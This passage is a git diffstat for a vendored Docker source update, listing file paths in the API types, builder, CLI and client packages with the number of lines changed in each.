.../docker/docker/api/server/server.go | 61 +- .../docker/docker/api/server/server_test.go | 7 +- .../github.com/docker/docker/api/swagger.yaml | 4153 ++++++++--- .../api/templates/server/operation.gotmpl | 4 +- .../docker/docker/api/types/auth.go | 2 +- .../docker/api/types/backend/backend.go | 86 +- .../docker/docker/api/types/backend/build.go | 44 + .../docker/docker/api/types/blkiodev/blkio.go | 2 +- .../docker/docker/api/types/client.go | 96 +- .../docker/docker/api/types/configs.go | 16 +- .../docker/api/types/container/config.go | 13 +- .../api/types/container/container_changes.go | 21 + 
.../api/types/container/container_create.go | 4 +- .../api/types/container/container_top.go | 21 + .../api/types/container/container_update.go | 4 +- .../api/types/container/container_wait.go | 16 +- .../docker/api/types/container/host_config.go | 127 +- .../api/types/container/hostconfig_unix.go | 42 +- .../api/types/container/hostconfig_windows.go | 55 +- .../api/types/container/waitcondition.go | 22 + .../docker/docker/api/types/events/events.go | 12 +- .../docker/api/types/filters/example_test.go | 24 + .../docker/docker/api/types/filters/parse.go | 274 +- .../docker/api/types/filters/parse_test.go | 176 +- .../docker/api/types/graph_driver_data.go | 17 + .../docker/api/types/image/image_history.go | 37 + .../api/types/image_delete_response_item.go | 15 + .../docker/docker/api/types/mount/mount.go | 27 +- .../docker/api/types/network/network.go | 53 +- .../docker/docker/api/types/plugin.go | 16 +- .../docker/api/types/plugin_responses.go | 25 +- .../api/types/plugins/logdriver/entry.pb.go | 449 ++ .../api/types/plugins/logdriver/entry.proto | 8 + .../docker/api/types/plugins/logdriver/gen.go | 3 + .../docker/api/types/plugins/logdriver/io.go | 87 + .../docker/docker/api/types/port.go | 2 +- .../api/types/reference/image_reference.go | 34 - .../types/reference/image_reference_test.go | 72 - .../docker/api/types/registry/authenticate.go | 4 +- .../docker/api/types/registry/registry.go | 23 +- .../docker/docker/api/types/seccomp.go | 4 +- .../docker/docker/api/types/stats.go | 5 +- .../docker/api/types/strslice/strslice.go | 2 +- .../api/types/strslice/strslice_test.go | 2 +- .../docker/docker/api/types/swarm/common.go | 19 +- .../docker/docker/api/types/swarm/config.go | 35 + .../docker/api/types/swarm/container.go | 36 +- .../docker/docker/api/types/swarm/network.go | 26 +- .../docker/docker/api/types/swarm/node.go | 3 +- .../docker/docker/api/types/swarm/runtime.go | 27 + .../docker/api/types/swarm/runtime/gen.go | 3 + .../api/types/swarm/runtime/plugin.pb.go | 
712 ++ .../api/types/swarm/runtime/plugin.proto | 20 + .../docker/docker/api/types/swarm/secret.go | 9 +- .../docker/docker/api/types/swarm/service.go | 39 +- .../docker/docker/api/types/swarm/swarm.go | 32 +- .../docker/docker/api/types/swarm/task.go | 93 +- .../docker/api/types/time/duration_convert.go | 2 +- .../api/types/time/duration_convert_test.go | 2 +- .../docker/docker/api/types/time/timestamp.go | 19 +- .../docker/api/types/time/timestamp_test.go | 6 +- .../docker/docker/api/types/types.go | 179 +- .../docker/api/types/versions/README.md | 4 +- .../docker/api/types/versions/compare.go | 2 +- .../docker/api/types/versions/compare_test.go | 2 +- .../docker/api/types/versions/v1p19/types.go | 2 +- .../docker/api/types/versions/v1p20/types.go | 2 +- .../docker/docker/api/types/volume.go | 17 +- .../{volumes_create.go => volume_create.go} | 8 +- .../{volumes_list.go => volume_list.go} | 8 +- .../adapters/containerimage/pull.go | 724 ++ .../builder-next/adapters/snapshot/layer.go | 113 + .../adapters/snapshot/snapshot.go | 445 ++ .../docker/builder/builder-next/builder.go | 419 ++ .../docker/builder/builder-next/controller.go | 157 + .../builder/builder-next/executor_unix.go | 17 + .../builder/builder-next/executor_windows.go | 21 + .../builder/builder-next/exporter/export.go | 146 + .../builder/builder-next/exporter/writer.go | 177 + .../builder/builder-next/reqbodyhandler.go | 67 + .../builder/builder-next/worker/worker.go | 323 + .../docker/docker/builder/builder.go | 170 +- .../docker/docker/builder/context.go | 260 - .../docker/docker/builder/context_test.go | 307 - .../docker/docker/builder/context_unix.go | 11 - .../docker/docker/builder/context_windows.go | 17 - .../docker/docker/builder/dockerfile/bflag.go | 176 - .../docker/builder/dockerfile/bflag_test.go | 187 - .../docker/builder/dockerfile/buildargs.go | 172 + .../builder/dockerfile/buildargs_test.go | 102 + .../docker/builder/dockerfile/builder.go | 547 +- 
.../docker/builder/dockerfile/builder_unix.go | 6 +- .../builder/dockerfile/builder_windows.go | 9 +- .../builder/dockerfile/clientsession.go | 76 + .../builder/dockerfile/command/command.go | 46 - .../builder/dockerfile/containerbackend.go | 146 + .../docker/docker/builder/dockerfile/copy.go | 560 ++ .../docker/builder/dockerfile/copy_test.go | 148 + .../docker/builder/dockerfile/copy_unix.go | 48 + .../docker/builder/dockerfile/copy_windows.go | 43 + .../docker/builder/dockerfile/dispatchers.go | 920 +-- .../builder/dockerfile/dispatchers_test.go | 719 +- .../builder/dockerfile/dispatchers_unix.go | 16 +- .../dockerfile/dispatchers_unix_test.go | 17 +- .../builder/dockerfile/dispatchers_windows.go | 57 +- .../dockerfile/dispatchers_windows_test.go | 50 +- .../docker/builder/dockerfile/envVarTest | 116 - .../docker/builder/dockerfile/evaluator.go | 396 +- .../builder/dockerfile/evaluator_test.go | 171 +- .../builder/dockerfile/evaluator_unix.go | 9 - .../builder/dockerfile/evaluator_windows.go | 13 - .../docker/builder/dockerfile/imagecontext.go | 121 + .../docker/builder/dockerfile/imageprobe.go | 63 + .../docker/builder/dockerfile/internals.go | 870 +-- .../builder/dockerfile/internals_linux.go | 88 + .../dockerfile/internals_linux_test.go | 138 + .../builder/dockerfile/internals_test.go | 130 +- .../builder/dockerfile/internals_unix.go | 38 - .../builder/dockerfile/internals_windows.go | 67 +- .../dockerfile/internals_windows_test.go | 40 +- .../docker/builder/dockerfile/metrics.go | 44 + .../builder/dockerfile/mockbackend_test.go | 148 + .../builder/dockerfile/parser/dumper/main.go | 36 - .../builder/dockerfile/parser/json_test.go | 61 - .../builder/dockerfile/parser/line_parsers.go | 361 - .../builder/dockerfile/parser/parser.go | 221 - .../builder/dockerfile/parser/parser_test.go | 173 - .../parser/testfile-line/Dockerfile | 35 - .../env_no_value/Dockerfile | 3 - .../shykes-nested-json/Dockerfile | 1 - .../testfiles/ADD-COPY-with-JSON/Dockerfile | 11 - 
.../testfiles/ADD-COPY-with-JSON/result | 10 - .../testfiles/brimstone-consuldock/Dockerfile | 26 - .../testfiles/brimstone-consuldock/result | 5 - .../brimstone-docker-consul/Dockerfile | 52 - .../testfiles/brimstone-docker-consul/result | 9 - .../testfiles/continueIndent/Dockerfile | 36 - .../parser/testfiles/continueIndent/result | 10 - .../testfiles/cpuguy83-nagios/Dockerfile | 54 - .../parser/testfiles/cpuguy83-nagios/result | 40 - .../parser/testfiles/docker/Dockerfile | 103 - .../dockerfile/parser/testfiles/docker/result | 24 - .../parser/testfiles/env/Dockerfile | 23 - .../dockerfile/parser/testfiles/env/result | 16 - .../testfiles/escape-after-comment/Dockerfile | 9 - .../testfiles/escape-after-comment/result | 3 - .../testfiles/escape-nonewline/Dockerfile | 7 - .../parser/testfiles/escape-nonewline/result | 3 - .../parser/testfiles/escape/Dockerfile | 6 - .../dockerfile/parser/testfiles/escape/result | 3 - .../parser/testfiles/escapes/Dockerfile | 14 - .../parser/testfiles/escapes/result | 6 - .../parser/testfiles/flags/Dockerfile | 10 - .../dockerfile/parser/testfiles/flags/result | 10 - .../parser/testfiles/health/Dockerfile | 10 - .../dockerfile/parser/testfiles/health/result | 9 - .../parser/testfiles/influxdb/Dockerfile | 15 - .../parser/testfiles/influxdb/result | 11 - .../Dockerfile | 1 - .../result | 1 - .../Dockerfile | 1 - .../result | 1 - .../Dockerfile | 1 - .../jeztah-invalid-json-single-quotes/result | 1 - .../Dockerfile | 1 - .../result | 1 - .../Dockerfile | 1 - .../result | 1 - .../parser/testfiles/json/Dockerfile | 8 - .../dockerfile/parser/testfiles/json/result | 8 - .../kartar-entrypoint-oddities/Dockerfile | 7 - .../kartar-entrypoint-oddities/result | 7 - .../lk4d4-the-edge-case-generator/Dockerfile | 48 - .../lk4d4-the-edge-case-generator/result | 29 - .../parser/testfiles/mail/Dockerfile | 16 - .../dockerfile/parser/testfiles/mail/result | 14 - .../testfiles/multiple-volumes/Dockerfile | 3 - 
.../parser/testfiles/multiple-volumes/result | 2 - .../parser/testfiles/mumble/Dockerfile | 7 - .../dockerfile/parser/testfiles/mumble/result | 4 - .../parser/testfiles/nginx/Dockerfile | 14 - .../dockerfile/parser/testfiles/nginx/result | 11 - .../parser/testfiles/tf2/Dockerfile | 23 - .../dockerfile/parser/testfiles/tf2/result | 20 - .../parser/testfiles/weechat/Dockerfile | 9 - .../parser/testfiles/weechat/result | 6 - .../parser/testfiles/znc/Dockerfile | 7 - .../dockerfile/parser/testfiles/znc/result | 5 - .../docker/builder/dockerfile/parser/utils.go | 176 - .../docker/builder/dockerfile/shell_parser.go | 329 - .../builder/dockerfile/shell_parser_test.go | 155 - .../docker/builder/dockerfile/support.go | 19 - .../docker/builder/dockerfile/support_test.go | 65 - .../docker/builder/dockerfile/utils_test.go | 2 +- .../docker/builder/dockerfile/wordsTest | 25 - .../docker/docker/builder/dockerignore.go | 48 - .../builder/dockerignore/dockerignore.go | 21 +- .../builder/dockerignore/dockerignore_test.go | 28 +- .../docker/docker/builder/fscache/fscache.go | 652 ++ .../docker/builder/fscache/fscache_test.go | 132 + .../docker/builder/fscache/naivedriver.go | 28 + .../github.com/docker/docker/builder/git.go | 28 - .../docker/docker/builder/remote.go | 157 - .../docker/builder/remotecontext/archive.go | 125 + .../docker/builder/remotecontext/detect.go | 180 + .../detect_test.go} | 48 +- .../docker/builder/remotecontext/filehash.go | 45 + .../docker/builder/remotecontext/generate.go | 3 + .../docker/builder/remotecontext/git.go | 35 + .../builder/remotecontext/git/gitutils.go | 204 + .../remotecontext/git/gitutils_test.go | 278 + .../builder/remotecontext/lazycontext.go | 102 + .../remotecontext}/mimetype.go | 15 +- .../builder/remotecontext/mimetype_test.go | 16 + .../docker/builder/remotecontext/remote.go | 127 + .../{ => remotecontext}/remote_test.go | 127 +- .../docker/builder/remotecontext/tarsum.go | 157 + .../docker/builder/remotecontext/tarsum.pb.go | 525 ++ 
.../docker/builder/remotecontext/tarsum.proto | 7 + .../builder/remotecontext/tarsum_test.go | 151 + .../builder/{ => remotecontext}/utils_test.go | 34 +- .../docker/docker/builder/tarsum.go | 158 - .../docker/docker/builder/tarsum_test.go | 265 - vendor/github.com/docker/docker/cli/cobra.go | 42 +- .../cli/command/bundlefile/bundlefile.go | 69 - .../cli/command/bundlefile/bundlefile_test.go | 77 - .../docker/cli/command/checkpoint/cmd.go | 24 - .../docker/cli/command/checkpoint/create.go | 58 - .../docker/cli/command/checkpoint/list.go | 62 - .../docker/cli/command/checkpoint/remove.go | 44 - .../docker/docker/cli/command/cli.go | 260 - .../docker/cli/command/commands/commands.go | 91 - .../docker/cli/command/container/attach.go | 130 - .../docker/cli/command/container/cmd.go | 46 - .../docker/cli/command/container/commit.go | 76 - .../docker/docker/cli/command/container/cp.go | 303 - .../docker/cli/command/container/create.go | 218 - .../docker/cli/command/container/diff.go | 58 - .../docker/cli/command/container/exec.go | 207 - .../docker/cli/command/container/exec_test.go | 116 - .../docker/cli/command/container/export.go | 59 - .../docker/cli/command/container/hijack.go | 116 - .../docker/cli/command/container/inspect.go | 47 - .../docker/cli/command/container/kill.go | 56 - .../docker/cli/command/container/list.go | 141 - .../docker/cli/command/container/logs.go | 87 - .../docker/cli/command/container/pause.go | 49 - .../docker/cli/command/container/port.go | 78 - .../docker/cli/command/container/prune.go | 75 - .../docker/cli/command/container/ps_test.go | 118 - .../docker/cli/command/container/rename.go | 51 - .../docker/cli/command/container/restart.go | 62 - .../docker/docker/cli/command/container/rm.go | 73 - .../docker/cli/command/container/run.go | 285 - .../docker/cli/command/container/start.go | 179 - .../docker/cli/command/container/stats.go | 243 - .../cli/command/container/stats_helpers.go | 226 - .../cli/command/container/stats_unit_test.go | 20 
- .../docker/cli/command/container/stop.go | 67 - .../docker/cli/command/container/top.go | 58 - .../docker/cli/command/container/tty.go | 103 - .../docker/cli/command/container/unpause.go | 50 - .../docker/cli/command/container/update.go | 163 - .../docker/cli/command/container/utils.go | 143 - .../docker/cli/command/container/wait.go | 50 - .../docker/docker/cli/command/events_utils.go | 49 - .../docker/cli/command/formatter/container.go | 235 - .../cli/command/formatter/container_test.go | 398 -- .../docker/cli/command/formatter/custom.go | 51 - .../cli/command/formatter/custom_test.go | 28 - .../cli/command/formatter/disk_usage.go | 334 - .../docker/cli/command/formatter/formatter.go | 123 - .../docker/cli/command/formatter/image.go | 259 - .../cli/command/formatter/image_test.go | 333 - .../docker/cli/command/formatter/network.go | 117 - .../cli/command/formatter/network_test.go | 208 - .../docker/cli/command/formatter/reflect.go | 65 - .../cli/command/formatter/reflect_test.go | 66 - .../docker/cli/command/formatter/service.go | 322 - .../docker/cli/command/formatter/stats.go | 211 - .../cli/command/formatter/stats_test.go | 228 - .../docker/cli/command/formatter/volume.go | 121 - .../cli/command/formatter/volume_test.go | 189 - .../cli/command/idresolver/idresolver.go | 90 - .../docker/docker/cli/command/image/build.go | 477 -- .../docker/docker/cli/command/image/cmd.go | 33 - .../docker/cli/command/image/history.go | 99 - .../docker/docker/cli/command/image/import.go | 88 - .../docker/cli/command/image/inspect.go | 44 - .../docker/docker/cli/command/image/list.go | 96 - .../docker/docker/cli/command/image/load.go | 77 - .../docker/docker/cli/command/image/prune.go | 92 - .../docker/docker/cli/command/image/pull.go | 84 - .../docker/docker/cli/command/image/push.go | 61 - .../docker/docker/cli/command/image/remove.go | 77 - .../docker/docker/cli/command/image/save.go | 57 - .../docker/docker/cli/command/image/tag.go | 41 - 
.../docker/docker/cli/command/image/trust.go | 381 - .../docker/cli/command/image/trust_test.go | 57 - .../docker/docker/cli/command/in.go | 75 - .../docker/cli/command/inspect/inspector.go | 195 - .../cli/command/inspect/inspector_test.go | 221 - .../docker/docker/cli/command/network/cmd.go | 28 - .../docker/cli/command/network/connect.go | 64 - .../docker/cli/command/network/create.go | 226 - .../docker/cli/command/network/disconnect.go | 41 - .../docker/cli/command/network/inspect.go | 45 - .../docker/docker/cli/command/network/list.go | 76 - .../docker/cli/command/network/prune.go | 73 - .../docker/cli/command/network/remove.go | 43 - .../docker/docker/cli/command/node/cmd.go | 43 - .../docker/docker/cli/command/node/demote.go | 36 - .../docker/docker/cli/command/node/inspect.go | 144 - .../docker/docker/cli/command/node/list.go | 115 - .../docker/docker/cli/command/node/opts.go | 60 - .../docker/docker/cli/command/node/promote.go | 36 - .../docker/docker/cli/command/node/ps.go | 93 - .../docker/docker/cli/command/node/remove.go | 56 - .../docker/docker/cli/command/node/update.go | 121 - .../docker/docker/cli/command/out.go | 69 - .../docker/docker/cli/command/plugin/cmd.go | 31 - .../docker/cli/command/plugin/create.go | 125 - .../docker/cli/command/plugin/disable.go | 36 - .../docker/cli/command/plugin/enable.go | 47 - .../docker/cli/command/plugin/inspect.go | 42 - .../docker/cli/command/plugin/install.go | 208 - .../docker/docker/cli/command/plugin/list.go | 63 - .../docker/docker/cli/command/plugin/push.go | 71 - .../docker/cli/command/plugin/remove.go | 55 - .../docker/docker/cli/command/plugin/set.go | 22 - .../docker/cli/command/plugin/upgrade.go | 100 - .../docker/docker/cli/command/prune/prune.go | 50 - .../docker/docker/cli/command/registry.go | 186 - .../docker/cli/command/registry/login.go | 85 - .../docker/cli/command/registry/logout.go | 77 - .../docker/cli/command/registry/search.go | 126 - .../docker/docker/cli/command/secret/cmd.go | 25 - 
.../docker/cli/command/secret/create.go | 79 - .../docker/cli/command/secret/inspect.go | 45 - .../docker/docker/cli/command/secret/ls.go | 68 - .../docker/cli/command/secret/remove.go | 57 - .../docker/docker/cli/command/secret/utils.go | 76 - .../docker/docker/cli/command/service/cmd.go | 29 - .../docker/cli/command/service/create.go | 100 - .../docker/cli/command/service/inspect.go | 84 - .../cli/command/service/inspect_test.go | 129 - .../docker/docker/cli/command/service/list.go | 158 - .../docker/docker/cli/command/service/logs.go | 163 - .../docker/docker/cli/command/service/opts.go | 648 -- .../docker/cli/command/service/opts_test.go | 107 - .../docker/cli/command/service/parse.go | 68 - .../docker/docker/cli/command/service/ps.go | 76 - .../docker/cli/command/service/remove.go | 47 - .../docker/cli/command/service/scale.go | 96 - .../docker/cli/command/service/trust.go | 96 - .../docker/cli/command/service/update.go | 849 --- .../docker/cli/command/service/update_test.go | 384 - .../docker/docker/cli/command/stack/cmd.go | 35 - .../docker/docker/cli/command/stack/common.go | 60 - .../docker/docker/cli/command/stack/deploy.go | 357 - .../cli/command/stack/deploy_bundlefile.go | 83 - .../docker/docker/cli/command/stack/list.go | 113 - .../docker/docker/cli/command/stack/opts.go | 49 - .../docker/docker/cli/command/stack/ps.go | 61 - .../docker/docker/cli/command/stack/remove.go | 112 - .../docker/cli/command/stack/services.go | 79 - .../docker/docker/cli/command/swarm/cmd.go | 28 - .../docker/docker/cli/command/swarm/init.go | 85 - .../docker/docker/cli/command/swarm/join.go | 69 - .../docker/cli/command/swarm/join_token.go | 105 - .../docker/docker/cli/command/swarm/leave.go | 44 - .../docker/docker/cli/command/swarm/opts.go | 209 - .../docker/cli/command/swarm/opts_test.go | 37 - .../docker/docker/cli/command/swarm/unlock.go | 54 - .../docker/cli/command/swarm/unlock_key.go | 79 - .../docker/docker/cli/command/swarm/update.go | 72 - 
.../docker/docker/cli/command/system/cmd.go | 26 - .../docker/docker/cli/command/system/df.go | 56 - .../docker/cli/command/system/events.go | 140 - .../docker/docker/cli/command/system/info.go | 334 - .../docker/cli/command/system/inspect.go | 203 - .../docker/docker/cli/command/system/prune.go | 93 - .../docker/cli/command/system/version.go | 113 - .../docker/docker/cli/command/task/print.go | 161 - .../docker/docker/cli/command/trust.go | 39 - .../docker/docker/cli/command/utils.go | 87 - .../docker/docker/cli/command/volume/cmd.go | 45 - .../docker/cli/command/volume/create.go | 111 - .../docker/cli/command/volume/inspect.go | 55 - .../docker/docker/cli/command/volume/list.go | 91 - .../docker/docker/cli/command/volume/prune.go | 75 - .../docker/cli/command/volume/remove.go | 68 - .../docker/cli/compose/convert/compose.go | 116 - .../cli/compose/convert/compose_test.go | 122 - .../docker/cli/compose/convert/service.go | 416 -- .../cli/compose/convert/service_test.go | 216 - .../docker/cli/compose/convert/volume.go | 128 - .../docker/cli/compose/convert/volume_test.go | 133 - .../compose/interpolation/interpolation.go | 90 - .../interpolation/interpolation_test.go | 59 - .../docker/cli/compose/loader/example1.env | 8 - .../docker/cli/compose/loader/example2.env | 1 - .../cli/compose/loader/full-example.yml | 287 - .../docker/cli/compose/loader/loader.go | 653 -- .../docker/cli/compose/loader/loader_test.go | 800 --- .../docker/cli/compose/schema/bindata.go | 260 - .../schema/data/config_schema_v3.0.json | 383 - .../schema/data/config_schema_v3.1.json | 428 -- .../docker/cli/compose/schema/schema.go | 137 - .../docker/cli/compose/schema/schema_test.go | 52 - .../docker/cli/compose/template/template.go | 100 - .../cli/compose/template/template_test.go | 83 - .../docker/docker/cli/compose/types/types.go | 253 - .../docker/docker/cli/config/configdir.go | 25 + .../docker/docker/cli/debug/debug.go | 26 + .../docker/{utils => cli/debug}/debug_test.go | 22 +- 
vendor/github.com/docker/docker/cli/error.go | 2 +- .../docker/docker/cli/flags/client.go | 13 - .../docker/docker/cli/flags/common_test.go | 42 - .../github.com/docker/docker/cli/required.go | 77 +- .../docker/docker/cli/trust/trust.go | 232 - .../docker/docker/cliconfig/config.go | 120 - .../docker/docker/cliconfig/config_test.go | 621 -- .../docker/cliconfig/configfile/file.go | 183 - .../docker/cliconfig/configfile/file_test.go | 27 - .../cliconfig/credentials/credentials.go | 17 - .../cliconfig/credentials/default_store.go | 22 - .../credentials/default_store_darwin.go | 3 - .../credentials/default_store_linux.go | 3 - .../credentials/default_store_unsupported.go | 5 - .../credentials/default_store_windows.go | 3 - .../cliconfig/credentials/file_store.go | 53 - .../cliconfig/credentials/file_store_test.go | 139 - .../cliconfig/credentials/native_store.go | 144 - .../credentials/native_store_test.go | 355 - .../docker/docker/client/build_cancel.go | 21 + .../docker/docker/client/build_prune.go | 30 + .../docker/docker/client/checkpoint_create.go | 5 +- .../docker/client/checkpoint_create_test.go | 4 +- .../docker/docker/client/checkpoint_delete.go | 4 +- .../docker/client/checkpoint_delete_test.go | 4 +- .../docker/docker/client/checkpoint_list.go | 8 +- .../docker/client/checkpoint_list_test.go | 15 +- .../github.com/docker/docker/client/client.go | 326 +- .../docker/docker/client/client_mock_test.go | 10 +- .../docker/docker/client/client_test.go | 376 +- .../docker/docker/client/client_unix.go | 7 +- .../docker/docker/client/client_windows.go | 5 +- .../docker/docker/client/config_create.go | 25 + .../docker/client/config_create_test.go | 70 + .../docker/docker/client/config_inspect.go | 36 + .../docker/client/config_inspect_test.go | 103 + .../docker/docker/client/config_list.go | 38 + .../docker/docker/client/config_list_test.go | 107 + .../docker/docker/client/config_remove.go | 13 + .../docker/client/config_remove_test.go | 60 + 
.../docker/docker/client/config_update.go | 21 + .../docker/client/config_update_test.go | 61 + .../docker/docker/client/container_attach.go | 24 +- .../docker/docker/client/container_commit.go | 20 +- .../docker/client/container_commit_test.go | 6 +- .../docker/docker/client/container_copy.go | 30 +- .../docker/client/container_copy_test.go | 37 +- .../docker/docker/client/container_create.go | 12 +- .../docker/client/container_create_test.go | 50 +- .../docker/docker/client/container_diff.go | 10 +- .../docker/client/container_diff_test.go | 8 +- .../docker/docker/client/container_exec.go | 6 +- .../docker/client/container_exec_test.go | 5 +- .../docker/docker/client/container_export.go | 5 +- .../docker/client/container_export_test.go | 5 +- .../docker/docker/client/container_inspect.go | 21 +- .../docker/client/container_inspect_test.go | 27 +- .../docker/docker/client/container_kill.go | 5 +- .../docker/client/container_kill_test.go | 5 +- .../docker/docker/client/container_list.go | 4 +- .../docker/client/container_list_test.go | 4 +- .../docker/docker/client/container_logs.go | 38 +- .../docker/client/container_logs_test.go | 77 +- .../docker/docker/client/container_pause.go | 4 +- .../docker/client/container_pause_test.go | 5 +- .../docker/docker/client/container_prune.go | 4 +- .../docker/client/container_prune_test.go | 125 + .../docker/docker/client/container_remove.go | 6 +- .../docker/client/container_remove_test.go | 21 +- .../docker/docker/client/container_rename.go | 5 +- .../docker/client/container_rename_test.go | 5 +- .../docker/docker/client/container_resize.go | 4 +- .../docker/client/container_resize_test.go | 4 +- .../docker/docker/client/container_restart.go | 4 +- .../docker/client/container_restart_test.go | 5 +- .../docker/docker/client/container_start.go | 5 +- .../docker/client/container_start_test.go | 5 +- .../docker/docker/client/container_stats.go | 4 +- .../docker/client/container_stats_test.go | 5 +- 
.../docker/docker/client/container_stop.go | 13 +- .../docker/client/container_stop_test.go | 5 +- .../docker/docker/client/container_top.go | 10 +- .../docker/client/container_top_test.go | 8 +- .../docker/docker/client/container_unpause.go | 4 +- .../docker/client/container_unpause_test.go | 5 +- .../docker/docker/client/container_update.go | 4 +- .../docker/client/container_update_test.go | 4 +- .../docker/docker/client/container_wait.go | 85 +- .../docker/client/container_wait_test.go | 35 +- .../docker/docker/client/disk_usage.go | 4 +- .../docker/docker/client/disk_usage_test.go | 55 + .../docker/client/distribution_inspect.go | 38 + .../client/distribution_inspect_test.go | 32 + .../github.com/docker/docker/client/errors.go | 224 +- .../github.com/docker/docker/client/events.go | 5 +- .../docker/docker/client/events_test.go | 5 +- .../github.com/docker/docker/client/hijack.go | 186 +- .../docker/docker/client/hijack_test.go | 103 + .../docker/docker/client/image_build.go | 28 +- .../docker/docker/client/image_build_test.go | 9 +- .../docker/docker/client/image_create.go | 17 +- .../docker/docker/client/image_create_test.go | 5 +- .../docker/docker/client/image_history.go | 10 +- .../docker/client/image_history_test.go | 8 +- .../docker/docker/client/image_import.go | 11 +- .../docker/docker/client/image_import_test.go | 6 +- .../docker/docker/client/image_inspect.go | 13 +- .../docker/client/image_inspect_test.go | 19 +- .../docker/docker/client/image_list.go | 4 +- .../docker/docker/client/image_list_test.go | 4 +- .../docker/docker/client/image_load.go | 5 +- .../docker/docker/client/image_load_test.go | 5 +- .../docker/docker/client/image_prune.go | 4 +- .../docker/docker/client/image_prune_test.go | 120 + .../docker/docker/client/image_pull.go | 36 +- .../docker/docker/client/image_pull_test.go | 7 +- .../docker/docker/client/image_push.go | 23 +- .../docker/docker/client/image_push_test.go | 7 +- .../docker/docker/client/image_remove.go | 10 +- 
.../docker/docker/client/image_remove_test.go | 20 +- .../docker/docker/client/image_save.go | 5 +- .../docker/docker/client/image_save_test.go | 8 +- .../docker/docker/client/image_search.go | 6 +- .../docker/docker/client/image_search_test.go | 7 +- .../docker/docker/client/image_tag.go | 33 +- .../docker/docker/client/image_tag_test.go | 31 +- .../github.com/docker/docker/client/info.go | 4 +- .../docker/docker/client/info_test.go | 4 +- .../docker/docker/client/interface.go | 71 +- .../docker/client/interface_experimental.go | 5 +- .../docker/docker/client/interface_stable.go | 2 +- .../github.com/docker/docker/client/login.go | 6 +- .../docker/docker/client/network_connect.go | 5 +- .../docker/client/network_connect_test.go | 9 +- .../docker/docker/client/network_create.go | 4 +- .../docker/client/network_create_test.go | 4 +- .../docker/client/network_disconnect.go | 5 +- .../docker/client/network_disconnect_test.go | 4 +- .../docker/docker/client/network_inspect.go | 35 +- .../docker/client/network_inspect_test.go | 79 +- .../docker/docker/client/network_list.go | 4 +- .../docker/docker/client/network_list_test.go | 4 +- .../docker/docker/client/network_prune.go | 4 +- .../docker/client/network_prune_test.go | 113 + .../docker/docker/client/network_remove.go | 6 +- .../docker/client/network_remove_test.go | 5 +- .../docker/docker/client/node_inspect.go | 13 +- .../docker/docker/client/node_inspect_test.go | 21 +- .../docker/docker/client/node_list.go | 6 +- .../docker/docker/client/node_list_test.go | 4 +- .../docker/docker/client/node_remove.go | 7 +- .../docker/docker/client/node_remove_test.go | 5 +- .../docker/docker/client/node_update.go | 4 +- .../docker/docker/client/node_update_test.go | 5 +- .../github.com/docker/docker/client/ping.go | 22 +- .../docker/docker/client/ping_test.go | 83 + .../docker/docker/client/plugin_create.go | 6 +- .../docker/docker/client/plugin_disable.go | 4 +- .../docker/client/plugin_disable_test.go | 4 +- 
.../docker/docker/client/plugin_enable.go | 4 +- .../docker/client/plugin_enable_test.go | 4 +- .../docker/docker/client/plugin_inspect.go | 13 +- .../docker/client/plugin_inspect_test.go | 17 +- .../docker/docker/client/plugin_install.go | 10 +- .../docker/docker/client/plugin_list.go | 21 +- .../docker/docker/client/plugin_list_test.go | 108 +- .../docker/docker/client/plugin_push.go | 5 +- .../docker/docker/client/plugin_push_test.go | 5 +- .../docker/docker/client/plugin_remove.go | 6 +- .../docker/client/plugin_remove_test.go | 7 +- .../docker/docker/client/plugin_set.go | 4 +- .../docker/docker/client/plugin_set_test.go | 5 +- .../docker/docker/client/plugin_upgrade.go | 12 +- .../docker/docker/client/request.go | 78 +- .../docker/docker/client/request_test.go | 23 +- .../docker/docker/client/secret_create.go | 11 +- .../docker/client/secret_create_test.go | 21 +- .../docker/docker/client/secret_inspect.go | 16 +- .../docker/client/secret_inspect_test.go | 41 +- .../docker/docker/client/secret_list.go | 9 +- .../docker/docker/client/secret_list_test.go | 21 +- .../docker/docker/client/secret_remove.go | 9 +- .../docker/client/secret_remove_test.go | 21 +- .../docker/docker/client/secret_update.go | 10 +- .../docker/client/secret_update_test.go | 22 +- .../docker/docker/client/service_create.go | 146 +- .../docker/client/service_create_test.go | 158 +- .../docker/docker/client/service_inspect.go | 22 +- .../docker/client/service_inspect_test.go | 28 +- .../docker/docker/client/service_list.go | 6 +- .../docker/docker/client/service_list_test.go | 4 +- .../docker/docker/client/service_logs.go | 8 +- .../docker/docker/client/service_logs_test.go | 46 +- .../docker/docker/client/service_remove.go | 6 +- .../docker/client/service_remove_test.go | 18 +- .../docker/docker/client/service_update.go | 63 +- .../docker/client/service_update_test.go | 5 +- .../docker/docker/client/session.go | 18 + .../docker/client/swarm_get_unlock_key.go | 4 +- 
.../client/swarm_get_unlock_key_test.go | 59 + .../docker/docker/client/swarm_init.go | 6 +- .../docker/docker/client/swarm_init_test.go | 5 +- .../docker/docker/client/swarm_inspect.go | 6 +- .../docker/client/swarm_inspect_test.go | 4 +- .../docker/docker/client/swarm_join.go | 7 +- .../docker/docker/client/swarm_join_test.go | 5 +- .../docker/docker/client/swarm_leave.go | 7 +- .../docker/docker/client/swarm_leave_test.go | 5 +- .../docker/docker/client/swarm_unlock.go | 11 +- .../docker/docker/client/swarm_unlock_test.go | 48 + .../docker/docker/client/swarm_update.go | 6 +- .../docker/docker/client/swarm_update_test.go | 5 +- .../docker/docker/client/task_inspect.go | 14 +- .../docker/docker/client/task_inspect_test.go | 17 +- .../docker/docker/client/task_list.go | 6 +- .../docker/docker/client/task_list_test.go | 4 +- .../docker/docker/client/task_logs.go | 51 + .../docker/docker/client/transport.go | 15 +- .../github.com/docker/docker/client/utils.go | 7 +- .../docker/docker/client/version.go | 4 +- .../docker/docker/client/volume_create.go | 6 +- .../docker/client/volume_create_test.go | 8 +- .../docker/docker/client/volume_inspect.go | 14 +- .../docker/client/volume_inspect_test.go | 53 +- .../docker/docker/client/volume_list.go | 8 +- .../docker/docker/client/volume_list_test.go | 6 +- .../docker/docker/client/volume_prune.go | 6 +- .../docker/docker/client/volume_remove.go | 6 +- .../docker/client/volume_remove_test.go | 5 +- .../docker/docker/cmd/docker/daemon_none.go | 27 - .../docker/cmd/docker/daemon_none_test.go | 17 - .../docker/cmd/docker/daemon_unit_test.go | 30 - .../docker/docker/cmd/docker/daemon_unix.go | 79 - .../docker/docker/cmd/docker/docker.go | 180 - .../docker/docker/cmd/docker/docker_test.go | 32 - .../docker/cmd/docker/docker_windows.go | 18 - .../docker/docker/cmd/dockerd/config.go | 99 + 